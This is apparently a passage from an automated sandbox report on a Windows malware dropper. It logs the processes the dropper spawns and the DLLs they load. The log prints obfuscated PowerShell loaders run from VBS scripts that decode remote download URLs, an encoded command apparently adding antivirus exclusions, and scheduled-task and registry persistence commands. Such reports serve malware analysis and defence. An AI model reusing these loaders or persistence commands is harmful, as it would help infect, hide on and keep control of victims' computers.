InaBruSAbsl E i.usKKlikkoneLivN .as va2.pl4Hex7 u)');Shoepacs137 (Bebrejd $Boligkonsulentens);$Forskrev=$Sydforhngene[0];$Smutches=(Bebrejd 'Com$ ImgPreLTitOWaxbStraPrelTre: AusAf ASilP FiSFedU .oCAfgKI gEIncRSpaSLo =Runn aE VawMor- ndoPa.b,enJRapeF,dc.onTU,m OgdsPl,YH,nS,inTQuiE ,im Li..ta$SecRSjlETriPBruRT.iSNonEAntn,ouT B.ARotT eIGenO .yNSkrsCosu end BlGSupI nfGimt .ds');Shoepacs137 ($Smutches);Shoepacs137 (Bebrejd ' h$CatSUnoaTampnrrs TuuDescSnikEnde FerTo s pu.BnkH E,e tea VedLumeRebrBilsSub[Op $ unBZerrAlba Inm braVe npartSpoiKonp,ta]Tel= L $,peLOu a tonBuddTikbP roignf iso Oprbr eEftnFabiFornJasgSensMe 1Ens7 Sn3');$Udfordrernes229=Bebrejd 'P.d$SkaSJ.ra BrpAr.s F,uCouc PekHoleE sr Cos xy.S dD ,no raw knnRefl Bio Sna Bud,epFAboiPrelTwieFol( Sp$CanF Gro rerCyms P.kNewrSomeChrvInv,Bev$ForKIvrohavaPenlt piNert E i B.oO tnT.ie .nn C,s Al)';$Koalitionens=$Pregnenolone94;Shoepacs137 (Bebrejd 'Sku$S,oGInclGusoReib SyaDisLFol:BesnStrOSurnPalROvie ,uM OvEImmdL,gITh aTorb WaLScaEC u=Gaa( ArTBlaeHersRg.tSup-
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\user\Downloads\haus\Enalib.exe' 'C:\ProgramData\1be588a5b7\Enalib.exe' -Force
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Desktop\wow.exe "C:\Users\user\Desktop\wow.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\Loader.exe "C:\Users\user\Downloads\haus\Loader.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\sel1.exe "C:\Users\user\Downloads\haus\sel1.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\ABC.exe "C:\Users\user\Downloads\haus\ABC.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\traf.exe "C:\Users\user\Downloads\haus\traf.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\amada2.exe "C:\Users\user\Downloads\haus\amada2.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\vapo.exe "C:\Users\user\Downloads\haus\vapo.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\T.exe "C:\Users\user\Downloads\haus\T.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\conhost.exe "C:\Users\user\Downloads\haus\conhost.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\WatchDog.exe "C:\Users\user\Downloads\haus\WatchDog.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Users\user\Downloads\haus\Enalib.exe "C:\Users\user\Downloads\haus\Enalib.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\haus\Lovform.vbs" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\haus\Rodham.vbs" Jump to behavior
                            Source: C:\Users\user\Desktop\wow.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\haus\Fuldautomatiseres.vbs" Jump to behavior
                            Source: C:\Users\user\Downloads\haus\sel1.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
                            Source: C:\Users\user\Downloads\haus\traf.exeProcess created: unknown unknown
                            Source: C:\Users\user\Downloads\haus\amada2.exeProcess created: C:\ProgramData\1be588a5b7\gdsun.exe c:\programdata\1be588a5b7\gdsun.exe
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\1be588a5b7
                            Source: C:\Users\user\Downloads\haus\vapo.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "vapo" /tr "C:\Users\user\AppData\Roaming\vapo.exe"
                            Source: C:\Users\user\Downloads\haus\T.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\user\Downloads\haus\T.exe' 'C:\ProgramData\1be588a5b7\T.exe' -Force
                            Source: C:\Users\user\Downloads\haus\conhost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAFcANQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABHAHMAVwBKAHUATQBXACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAbgBCAHYARwBFADkASgBLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAOABKADAAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                            Source: C:\Users\user\Downloads\haus\conhost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                            Source: C:\Users\user\Downloads\haus\conhost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6620" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                            Source: C:\Users\user\Downloads\haus\Enalib.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\user\Downloads\haus\Enalib.exe' 'C:\ProgramData\1be588a5b7\Enalib.exe' -Force
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Svrte; function Bebrejd($Stomode){$Gemologist=3;do{$Uncountervailed+=$Stomode[$Gemologist];$Gemologist+=4} until(!$Stomode[$Gemologist])$Uncountervailed}function Shoepacs137($Typhobacillosis){ .($Facies) ($Typhobacillosis)}$Reprsentationsudgifts=Bebrejd 'jouN oEVi TSni.SorW';$Reprsentationsudgifts+=Bebrejd 'UnheBenBSubCHa,LA ti BaeManN loT';$Landboforenings173=Bebrejd 'PolMLinoTouzB ni PrlMadl craVaf/';$Shirra=Bebrejd 'KnoTBoolI tssuz1Br 2';$Boligkonsulentens=' St[Norn onEdk.T bo..fvSEn EFrkRPervBryi eacInfePrepHydOexti onNDamtDyrMPavAFreNSejAUveG u eGenrNeu]Aar: el:LassSaeeFedc nuRafR StiFedTHanY idPEnjrAf.OlottCigo ruCOv O SmLBro=Kal$ djs kkhNyhi yrRTriR hea';$Landboforenings173+=Bebrejd 'Co 5Un . ss0 Sk .ig( A WCoriBr,n I dFaroUdfwSlasMng conN,anTIll Fe1M.c0 Bo.Ha.0Ypp;Gen GloWHjliInsnCaf6 an4flu; Un gsx Fi6Chr4 Pr;Dik S crForv C.:Per1 St3 ow4Ind. rn0Arn) I IneGFale DucpotkShioRes/Bo 2,aa0La 1Nig0kv 0 ev1Bod0For1Skr an,F itiUnsrBane nfM aoS uxSti/kon1N l3 dg4Drm.d.u0';$Bramantip=Bebrejd ' ru ShsDeleF rRDmp- ShATr gSmiEMilNAmbt';$Forskrev=Bebrejd 'SmahPapttvatFempChesSte:F r/Sy,/ ShfS ni MolJete udBaanHex.K,aeS iuTax/nivlNeumLaejKamMgen1 gtIOvetA.kibroFJarCSwiHBocjU cYK eABe 4KapJRauNBruRA aBMerYModBTr 3Mar4Sc / SaUUnonS cdbareon r vb Opa Akl ydaSelnDelcAboe rurStan,oleHjasTwi.tarjBebaS ovMana';$Sjaslikkens247=Bebrejd ' Op>';$Facies=Bebrejd 'NonITraE SuX';$Torrentially21='Topazolite';$Gordiaceous='\Transitvarerne.Fli';Shoepacs137 (Bebrejd 'F.l$HjfGAfsl leOAerb BraTeaL n:IrrPForR.dde heGNebn .peIn NBadoForlGr OUn,nopfEpre9Str4.il=gol$gi EnedN,kiv,ph:sydA VeP EkPge DMetAResTRe,aDec+ind$Plag NooDelRAskD NaI,ilaUnscAlpeTh Oas,uXylS');Shoepacs137 (Bebrejd 'lan$RetG E,l TiORelBLjba polO e: Fos utyTruDRekFTavO ViR ,ahPaeN,pig ScEAukNUnsE.ty= Se$ A,F.beO.ndrS.rSS ckKolRProEEnsV Dr..xcsEjePRutLsatIhottDyn(Ego$ uts E j InaBruSAbsl E i.usKKlikkoneLivN .as va2.pl4Hex7 u)');Shoepacs137 (Bebrejd $Boligkonsulentens);$Forskrev=$Sydforhngene[0];$Smutches=(Bebrejd 'Com$ ImgPreLTitOWaxbStraPrelTre: AusAf ASilP FiSFedU .oCAfgKI gEIncRSpaSLo =Runn aE VawMor- ndoPa.b,enJRapeF,dc.onTU,m OgdsPl,YH,nS,inTQuiE ,im Li..ta$SecRSjlETriPBruRT.iSNonEAntn,ouT B.ARotT eIGenO .yNSkrsCosu end BlGSupI nfGimt .ds');Shoepacs137 ($Smutches);Shoepacs137 (Bebrejd ' h$CatSUnoaTampnrrs TuuDescSnikEnde FerTo s pu.BnkH E,e tea VedLumeRebrBilsSub[Op $ unBZerrAlba Inm braVe npartSpoiKonp,ta]Tel= L $,peLOu a tonBuddTikbP roignf iso Oprbr eEftnFabiFornJasgSensMe 1Ens7 Sn3');$Udfordrernes229=Bebrejd 'P.d$SkaSJ.ra BrpAr.s F,uCouc PekHoleE sr Cos xy.S dD ,no raw knnRefl Bio Sna Bud,epFAboiPrelTwieFol( Sp$CanF Gro rerCyms P.kNewrSomeChrvInv,Bev$ForKIvrohavaPenlt piNert E i B.oO tnT.ie .nn C,s Al)';$Koalitionens=$Pregnenolone94;Shoepacs137 (Bebrejd 'Sku$S,oGInclGusoReib SyaDisLFol:BesnStrOSurnPalROvie ,uM OvEImmdL,gITh aTorb WaLScaEC u=Gaa( ArTBlaeHersRg.tSup-
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Uforfrdetheds181; function Yasmak($Unsatanical){$Puritanic=3;do{$Joumbos+=$Unsatanical[$Puritanic];$Puritanic+=4} until(!$Unsatanical[$Puritanic])$Joumbos}function Seksualhygiejnen($Unshowmanlike){ .($bluenoser) ($Unshowmanlike)}$Calamondin=Yasmak 'T nn onEchaTGra.Ke W';$Calamondin+=Yasmak 'Jo EU sbSt,cCoulHarI.tue InnRebT';$Longwise=Yasmak 'ForMMi.oSorzGaviF rl,irlA faEnt/';$Stavkirkes=Yasmak ' AmTovel WasI n1Avn2';$Litterateur36='S.e[Plan .oeFreTFus.BusS IneT urSamv TaI Brc HueN npCe oMiniBilNOliTAtoMFimA AknLenAIvrGHese arUnc] Mo: a:halSAfkEElecF ruLilrMyxID rtMacY,egPPetrProo .aT,alo NoCAtooP rl B = re$ .aST xtMisA GavEmbKUdkiAccRfemkPreeForS';$Longwise+=Yasmak 'Low5 k .me 0Ov Snd(YasWUnhi,ocnUnbdNovoTrawM ds Sp OveNAnmTFra Ine1 ic0.nt. tr0Kli; ro AttWAkviI dn Un6 Ba4Lab;Fi, K txPre6Hel4No ;,cc BrrDisvOv : h1Pra3Muf4 H .Qu 0Sup) Un F rG .neKyscG.sk,amoGrn/Liv2Fra0Ank1Res0Non0 Pa1Can0 an1Mio ConFA.yigu.rLg e .yf FioHypxMa,/Kvl1Br 3Lns4Tra. on0';$Daarlighed=Yasmak 'midU UnSRepeT arVes-StrAFakG UneProN M T';$Radioactive=Yasmak ' Mah ertExotSkipA,ts nd:,at/pol/ComfNoni ilEt eSamdUnan.ro.floe H uLis/IntlordmAffjBonM ny1ManI .nt Tai,beFBruCE,uHIrrjkoeYFisATer4ApaJDahNOphRWeeBSvvYForB a3Ly 4B,f/ OvODepuHomt ResForoH ba .ar if. artPelo R c';$Stbeformens=Yasmak 'San>';$bluenoser=Yasmak 'SkriProeTilx';$Courtmartial='Hale';$Bacillebrerens='\Autonephrectomy.Noc';Seksualhygiejnen (Yasmak 'Pre$ForGHjeLUndoSchb MoaHallStr:SheUNadnDesCFrdUInhsS.ohAlfiF noLanNGarE orDPr =Ord$ SaEHypNPr.vBe,: UdA rsP N PPaud ekAViqt FuaMal+Bre$LamBPorA apCOutI ,ol arLS.rE rybOver.nmE ToRForET ln.eas');Seksualhygiejnen (Yasmak 'Sla$ Cog HalSjaO,kiBMura ppLRec:IllMA hYBorS CetThrIpolk te,ipr U.efannHal1Enr4Ant1 el= nn$ esr AkALigdG viComOUbna giCSanTerii,akVFore ,a.KursMagp,ncL uiIT oT in(Kmp$RouSAfsTDe BObsETenf ceoDacr PamFliE R nPl sLas)');Seksualhygiejnen (Yasmak $Litterateur36);$Radioactive=$Mystikeren141[0];$Recognise=(Yasmak 'Kip$LgfgBooLPreo DabXenaFinlPre:na eCheNTrnAstymHaleunmL JaI H,nBliGU.hSEla=SpanfulEDecW os- .io xcBO vjIndECouc ,vt P MoS.oaYPres ibt Flesc mr.l.Rad$EkscFugA ptl ,rALi,MEksoStunSupdUpcIKjon');Seksualhygiejnen ($Recognise);Seksualhygiejnen (Yasmak ' Uf$ B E denWuzaCymmPreeMi,l leiBernStagSubsO e. dHBlye Ala .odSp eBi,rUncsKe,[Abi$WalDOr.awyvaKilrBryl,ntiT,lglarhBese,epdEd ]Myr=Sys$.paLKonoRetnNongG nwStuia.tsEjee');$Upcutting173=Yasmak 'S g$Ju,EPr.nChuaFalma,re BrlReriS lnSkagChus Kr.DiaDMoyo tewTr nB tlGlao PoaAk dThyFBe.ihyll uneGem(Phi$SipR InaSupdSariUncoOveaIt cTaatFo iRunvHj e H ,Ta $ irV ,ii OtdRepe anbFloe .og yprH,oetoftBlosLa,1 Ud7 l 9d k)';$Videbegrets179=$Uncushioned;Seksualhygiejnen (Yasmak 'P r$ iGSquLSelopl bBeha arLSka:ScrsCoitTafRC aufrdkPertBakU ivRAr.eUs.RSape ,us Pr=Pa (ColtSplE BrS BaTB l-Ab.pblaA eT lahDec Ser$ .aVlocI edVe EPh BLigECligtror aeO,etFleSFra1De,7S e9Dev)');while (!$Struktureres
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAFcANQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABHAHMAVwBKAHUATQBXACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAbgBCAHYARwBFADkASgBLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAOABKADAAIwA+AA=="
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6620" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\GameBarPresenceWriter.exeSection loaded: powrprof.dllJump to behavior
                            Source: C:\Windows\System32\GameBarPresenceWriter.exeSection loaded: umpdc.dllJump to behavior
                            Source: C:\Windows\System32\GameBarPresenceWriter.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\GameBarPresenceWriter.exeSection loaded: xblauthmanagerproxy.dllJump to behavior
                            Source: C:\Windows\System32\GameBarPresenceWriter.exeSection loaded: gamebarpresencewriter.proxy.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: ieframe.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: netapi32.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: mlang.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: tiledatarepository.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: staterepository.core.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepository.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: mrmcorer.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: appxdeploymentclient.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
